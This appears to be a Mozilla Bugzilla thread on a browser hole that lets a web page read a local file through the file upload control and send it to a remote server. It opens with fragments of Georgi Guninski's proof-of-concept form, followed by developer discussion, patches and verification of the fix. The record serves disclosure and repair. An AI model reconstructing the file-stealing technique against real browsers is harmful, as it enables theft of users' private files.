Posting the real bug.
It is possible to steal local files with the file upload control.
This is somewhat related to bug 163598 but the trick is done with
The following reads a local file and sends it to remote server.
Written by <a href="http://www.guninski.com">Georgi Guninski</a>
<form action="http://localhost/cgi-bin/x.pl" enctype="multipart/form-data"
Mouse over this:
<input type=file name=c
Due to the increased number of file upload attacks, I suggest adding a
warning whenever a file is being uploaded.
cc'ing firstname.lastname@example.org per mitchell's out of office.
Adding a bunch of people who were on bug 163598
Any ideas on what it takes to fix this? jkeiser, should this be assigned to you
jkieser: should you own this bug?
This seems very similar to bug 163598.
Sigh. Would someone mind finding these exploits closer to the beginning of a
release cycle? :) I've never even heard of relatedTarget.
And upload your testcase if you could be so kind. I'll see what I can see.
Okay, so this one raises a couple of interesting questions. Should
relatedContent be able to see anonymous content at all? relatedContent is part
of the DOM spec, having content under a file control is not. Of course that
doesn't change the fact that we use relatedContent to look at anonymous content
inside of tooltips so making it not see anonymous content could regress
something. I have a fix (extension of the 163598 bug fix) that takes care of
file controls. That may be as far as we want to go right now.
Created attachment 96329 [details] [diff] [review]
-> security, joki
Comment on attachment 96329 [details] [diff] [review]
Argh, this copies jkeiser's fix, not including final nit-picks. Can you (a)
copy the final fix or (b, better) subroutine so the code is shared?
/be (using Asa's laptop)
Actually the patch is based on the final version of jkeiser's fix. But if
you're talking about your ++numParentsChecked nit I just put that in. As for
sharing the code I have hopes of fixing this version to better deal with
anonymous content in the future (the behavior of relatedTarget and
originalTarget as regards anonymous content is not exactly the same) so I'd
rather keep it separate.
See also bug 164086, the same hole using event.rangeParent.
Created attachment 96401 [details]
*** Bug 164687 has been marked as a duplicate of this bug. ***
Fixed with bug 164086.
Verified on 7.0RTM build on Win 2000.
When mouse over on the text field, an exception is thrown and the text of the
"Submit" button is not changed.
When some file is selected in the text box using Browse button and then mouse
over, "Submit" button text is changed and it shows some file location. An
exception is also thrown at this time.
So, reopening the bug to make validate that this behavior is acceptable or not
bsharma: are you saying that the text in the Submit button ("Submit Query")
*changes* when you follow these steps:
- Go to http://bugzilla.mozilla.org/attachment.cgi?id=96401&action=view
- Click the Browse ... button and select a file [text of file shows up in text
- Mouse over the text input [exception is thrown, nothing user-visible happens]
If not, I'm unclear on what you are saying.
Yes, that is exactly what I mean.
This looks fine to me. I think the bug is fixed. Someone should close it again.
Yes, this seems OK to me. I'm marking the bug Fixed again.
Verified on the 2002-10-08-trunk build on Win 2000.
The test case works as expected.